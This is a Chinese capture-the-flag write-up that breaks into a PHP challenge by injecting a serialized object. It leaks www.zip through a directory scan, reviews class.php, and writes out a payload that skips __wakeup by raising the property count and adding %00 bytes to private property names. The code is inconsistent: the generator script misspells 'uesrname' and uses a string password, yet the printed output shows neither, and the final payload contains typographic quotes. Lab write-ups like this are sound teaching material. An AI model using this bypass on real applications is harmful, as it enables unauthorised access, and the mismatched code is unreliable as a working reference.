通过目录扫描发现有www.zip
访问/www.zip
直接下载安装包
先看一下index.php里的PHP的相关内容
关键点在select,这是一个可控的变量
再看一下class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
利用了两个变量username,password ,构造函写入了username,password
wakeup是在反序列化的时候自动执行的一个函数,会将username改为guest
flag输出的条件是username=admin,password=100
构造这样一个对象
<?php
class Name
{
private $uesrname = 'admin';
private $password = '100';
}
$user = new Name();
$str = serialize($user);
//$str = urlencode(serialize($user));
var_dump($str);
?>
运行结果:string(77) "O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}"
把参数改成3个,只要不对应,wakeup函数就会被绕过
第一个属性名长度是14,但却只能看见12个字符,所以,就是因为 \0
空白符丢失不可见
在属性名和类名中添加%00。传入变量select,成功得到flag。
?select=O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}
参考:https://www.cnblogs.com/junlebao/p/13799762.html